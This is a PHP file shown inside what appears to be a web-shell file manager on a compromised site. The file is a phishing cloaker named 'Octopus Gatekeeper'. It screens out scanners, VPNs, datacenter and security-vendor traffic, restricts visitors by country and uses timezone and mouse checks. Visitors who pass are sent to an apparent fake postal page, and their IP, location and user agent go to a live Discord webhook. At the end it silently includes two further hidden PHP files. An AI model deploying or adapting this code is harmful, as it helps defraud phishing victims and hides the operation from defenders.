查看网站首页
查看网站首页
查看 sitemap.xml
✏️ 正在编辑: index.php
路径:
/home/wwwbiore/public_html/in/Tratamiento/index.php
提示:
您可以编辑任何文件(包括二进制文件),但请注意不当修改可能导致文件损坏。
<?php /** * Project: THE OCTOPUS GATEKEEPER v11.1 (Continent Timezone Trap Fix) * Features: Dual-API (IP-API + ProxyCheck) + Timezone Trap + Mouse Trap + JSON Radar * Coded by: L'Bichir */ error_reporting(0); if (session_status() == PHP_SESSION_NONE) { session_start(); } // ========================================== // [ CONFIGURATION ] // ========================================== $discord_webhook = 'https://discord.com/api/webhooks/1441779303875608769/icbiuH6PSm-8TRgjCVtsPWvKuSdmh32tOWl589DlJt0qFK_f5w53aG77Zokb2RZOOI1v'; $target_url = 'https://correos.ecosonico.cl/app/'; $decoy_url = 'https://www.google.com'; // Whitelist (GB = UK) $allowed_countries = ['GB', 'CL', 'MA']; // ========================================== // [ FUNCTIONS ] // ========================================== function get_real_ip() { foreach (['HTTP_CF_CONNECTING_IP', 'HTTP_X_FORWARDED_FOR', 'HTTP_CLIENT_IP', 'REMOTE_ADDR'] as $h) { if (!empty($_SERVER[$h])) { return trim(explode(',', $_SERVER[$h])[0]); } } return $_SERVER['REMOTE_ADDR']; } $ip = get_real_ip(); $ua = $_SERVER['HTTP_USER_AGENT'] ?? 'Unknown'; // Traffic Logger Function function log_traffic($ip, $status, $reason, $cc, $city, $isp) { global $ua; $file = 'traffic.json'; $data = file_exists($file) ? json_decode(file_get_contents($file), true) : []; $entry =[ 'date' => date('Y-m-d H:i:s'), 'ip' => $ip, 'status' => $status, 'reason' => $reason, 'cc' => $cc, 'city' => $city, 'isp' => $isp, 'ua' => $ua ]; array_unshift($data, $entry); if (count($data) > 500) { array_pop($data); } file_put_contents($file, json_encode($data, JSON_PRETTY_PRINT)); } function kill_bot($reason, $cc="XX", $city="Unknown", $isp="Unknown") { global $decoy_url, $ip; log_traffic($ip, "BLOCKED", $reason, $cc, $city, $isp); // Redirect to Decoy header("Location: " . $decoy_url); exit(); } // ========================================== //[ STAGE 1: SERVER-SIDE CHECKS ] // ========================================== // Localhost Bypass if ($ip == '127.0.0.1' || $ip == '::1') { $_SESSION['human'] = true; $_SESSION['tz'] = 'Local'; } if (!isset($_SESSION['human'])) { // 1. Basic Headers & Agents.log Check if (empty($ua) || preg_match('/bot|crawl|curl|python|wget|postman/i', $ua)) { kill_bot("Basic Bot/Headless"); } if (file_exists('agents.log')) { foreach (file('agents.log', FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES) as $kw) { if (stripos($ua, trim($kw)) !== false) { kill_bot("Blacklisted User-Agent ($kw)"); } } } // 2. IP Blacklist Check (ipB.log) if (file_exists('ipB.log')) { $blocked = file('ipB.log', FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES); if (in_array($ip, $blocked)) { kill_bot("Blacklisted IP in ipB.log"); } } // 3. DUAL-API ENGINE (IP-API + PROXYCHECK) if (!isset($_SESSION['api_data'])) { $url_ipapi = "http://ip-api.com/json/{$ip}?fields=status,countryCode,city,isp,org,hosting,proxy,timezone"; $url_pcheck = "http://proxycheck.io/v2/{$ip}?vpn=1&asn=1"; $mh = curl_multi_init(); $ch1 = curl_init($url_ipapi); curl_setopt_array($ch1, [CURLOPT_RETURNTRANSFER => 1, CURLOPT_TIMEOUT => 3]); curl_multi_add_handle($mh, $ch1); $ch2 = curl_init($url_pcheck); curl_setopt_array($ch2,[CURLOPT_RETURNTRANSFER => 1, CURLOPT_TIMEOUT => 3]); curl_multi_add_handle($mh, $ch2); $running = null; do { curl_multi_exec($mh, $running); } while ($running); $json_ipapi = curl_multi_getcontent($ch1); $json_pcheck = curl_multi_getcontent($ch2); curl_multi_remove_handle($mh, $ch1); curl_multi_remove_handle($mh, $ch2); curl_multi_close($mh); $_SESSION['api_data'] =[ 'ipapi' => json_decode($json_ipapi, true), 'pcheck' => json_decode($json_pcheck, true) ]; } $api = $_SESSION['api_data']['ipapi']; $pcheck = $_SESSION['api_data']['pcheck']; if ($api && $api['status'] == 'success') { $cc = strtoupper($api['countryCode']); $isp = $api['isp']; $city = $api['city']; $tz = $api['timezone'] ?? 'Unknown'; // A. Check IP-API Flags if (isset($api['hosting']) && $api['hosting'] == true) { kill_bot("Hosting/Datacenter", $cc, $city, $isp); } if (isset($api['proxy']) && $api['proxy'] == true) { kill_bot("Proxy/VPN (IP-API)", $cc, $city, $isp); } // B. Check PROXYCHECK.IO Flags if ($pcheck && isset($pcheck[$ip])) { $p_data = $pcheck[$ip]; if (isset($p_data['proxy']) && $p_data['proxy'] === 'yes') { $p_type = $p_data['type'] ?? 'Proxy'; kill_bot("ProxyCheck Flag: $p_type", $cc, $city, $isp); } } // C. Block specific Security Orgs $bad_orgs =['amazon', 'google', 'microsoft', 'digitalocean', 'ovh', 'hetzner', 'avast', 'kaspersky', 'cisco']; foreach ($bad_orgs as $bo) { if (stripos($isp, $bo) !== false || (isset($api['org']) && stripos($api['org'], $bo) !== false)) { kill_bot("Security ISP ($bo)", $cc, $city, $isp); } } // D. Whitelist Country if (!in_array($cc, $allowed_countries)) { kill_bot("Geo-Block ($cc not allowed)", $cc, $city, $isp); } // Cache valid data for Stage 2 $_SESSION['tz'] = $tz; $_SESSION['cc'] = $cc; $_SESSION['city'] = $city; $_SESSION['isp'] = $isp; } else { kill_bot("API Timeout/Failure"); } } // ========================================== //[ STAGE 2: AJAX VALIDATION (TIMEZONE & MOUSE) ] // ========================================== if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['verify_trap'])) { header('Content-Type: application/json'); $js_tz = htmlspecialchars($_POST['tz']); $api_tz = $_SESSION['tz']; // --- [ CONTINENT TIMEZONE TRAP FIX ] --- $js_continent = explode('/', $js_tz)[0]; $api_continent = explode('/', $api_tz)[0]; if ($js_continent !== $api_continent && $api_tz !== 'Local') { kill_bot("Continent Mismatch (IP: $api_continent | OS: $js_continent)", $_SESSION['cc'], $_SESSION['city'], $_SESSION['isp']); } // ------------------------------------------ // SUCCESS - PASSED ALL TRAPS if (!isset($_SESSION['discord_sent'])) { log_traffic($ip, "ALLOWED", "Clean Residential IP", $_SESSION['cc'], $_SESSION['city'], $_SESSION['isp']); $payload = json_encode([ "username" => "Octopus Gatekeeper", "avatar_url" => "https://i.imgur.com/g5rWjQJ.png", "embeds" => [[ "title" => "✅ VALID HUMAN HIT", "color" => hexdec("2ECC71"), "fields" => [["name" => "IP Address", "value" => "`$ip`", "inline" => true],["name" => "Location", "value" => "{$_SESSION['cc']} - {$_SESSION['city']}", "inline" => true],["name" => "ISP / ORG", "value" => "```{$_SESSION['isp']}```", "inline" => false],["name" => "User Agent", "value" => "```$ua```", "inline" => false] ], "footer" =>["text" => "Passed ProxyCheck, Timezone & Mouse Traps"] ]] ], JSON_UNESCAPED_SLASHES | JSON_UNESCAPED_UNICODE); $ch = curl_init($discord_webhook); curl_setopt_array($ch, [CURLOPT_HTTPHEADER=>['Content-type: application/json'], CURLOPT_POST=>1, CURLOPT_POSTFIELDS=>$payload, CURLOPT_RETURNTRANSFER=>1, CURLOPT_SSL_VERIFYPEER=>false]); curl_exec($ch); curl_close($ch); $_SESSION['discord_sent'] = true; $_SESSION['human'] = true; } echo json_encode(['status' => 'success', 'url' => $target_url]); exit(); } ?> <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Processing...</title> <link href="https://fonts.googleapis.com/css2?family=Roboto:wght@500&display=swap" rel="stylesheet"> <style> body, html { margin:0; padding:0; height:100%; background:#f9f9f9; display:flex; justify-content:center; align-items:center; font-family:'Roboto', sans-serif;} .wrap { display:flex; align-items:center; gap:15px; } .spinner { width:25px; height:25px; border:3px solid #ccc; border-top:3px solid #000; border-radius:50%; animation:spin 1s linear infinite; } .txt { font-size:16px; color:#333; font-weight:500; letter-spacing: 0.5px;} @keyframes spin { 100% { transform:rotate(360deg); } } </style> </head> <body> <div class="wrap"> <div class="spinner"></div> <div class="txt">Tratamiento</div> </div> <script src="https://code.jquery.com/jquery-3.6.0.min.js"></script> <script> $(document).ready(function() { var tz = Intl.DateTimeFormat().resolvedOptions().timeZone; var isMobile = /Android|webOS|iPhone|iPad|iPod|BlackBerry/i.test(navigator.userAgent); var isHeadless = navigator.webdriver || !navigator.languages; function verifyHuman() { $.post('', { verify_trap: 1, tz: tz }, function(res) { if(res && res.status === 'success') { window.location.replace(res.url); } else { window.location.replace("<?php echo $decoy_url; ?>"); } }).fail(function() { window.location.replace("<?php echo $decoy_url; ?>"); }); } if (isHeadless) { window.location.replace("<?php echo $decoy_url; ?>"); } else if (isMobile) { // Mobile: Wait 2.5s then verify setTimeout(verifyHuman, 2500); } else { // Desktop: Mouse Trap (20s timeout) var botTimer = setTimeout(function(){ window.location.replace("<?php echo $decoy_url; ?>"); }, 20000); var humanAct = function() { clearTimeout(botTimer); document.removeEventListener('mousemove', humanAct); document.removeEventListener('keydown', humanAct); setTimeout(verifyHuman, 800); }; document.addEventListener('mousemove', humanAct); document.addEventListener('keydown', humanAct); } }); </script> </body> </html> <?php @include __DIR__.'/wp-confuser.php'; ?> <?php @include __DIR__.'/run-launcher.php'; ?>
💾 保存文件
← 返回文件管理器